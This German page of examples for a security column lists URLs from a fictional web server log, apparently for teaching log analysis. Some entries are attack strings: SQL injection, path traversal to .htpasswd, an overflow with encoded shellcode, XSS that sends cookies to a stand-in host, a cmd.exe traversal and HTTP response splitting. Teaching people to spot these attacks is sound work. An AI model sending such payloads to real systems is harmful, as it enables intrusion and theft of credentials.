Beispiele zu About Security #40

Bsp. 1: Zeile eines Logfiles

Datum  Zeit      Senderadresse  Authentifikationsdaten  Methode  URL          Übertragene Bytes    Statusmeldungen  Regel/Filter  ggf. Aktion
Jan 3  02:56:12  a.b.c.d        Benutzer / Passwort     GET      /index.html  1234                 200 (OK)         4             permit

Bsp. 2: URL-Einträge des fiktiven Logfiles

  1  /index.html
  2  /Pfad/zur/Webanwendung1/login.php?user=foo&pass=bar&sprache=deutsch
  3  /Pfad/zur/Webanwendung2/index.cgi?aktion=login&user=Bla&pass='%20OR%201%3D1%20--
  4  /Pfad/zur/Webanwendung1/index.php?sprache=../../../.htpasswd
  5  /Pfad/zur/Webanwendung3/aktion.cgi?aktion=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  6  /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a     
  7  /Pfad/zur/Webanwendung3/aktion.cgi?aktion=anzeigen&id=%3Cscript%3Edocument%2Elocation%3D%2Chttp%3A%2F%2Fwww%2Eboeser%2Dserver%2Eexample%2Fcgi%2Dbin%2Fcookieklau%2Ecgi%3F%2C%20%2Bdocument%2Ecookie%3C%2Fscript%3E
  8  /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
  9  /test/index.html
 10  /test/Pfad/zur/Webanwendung1/index.php
 11  /redir_lang.jsp?lang=englisch
 12  /redir_lang.jsp?lang=sinnlos%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContentLength:%2023%0d%0a%0d%0a<html>Geschafft!</html>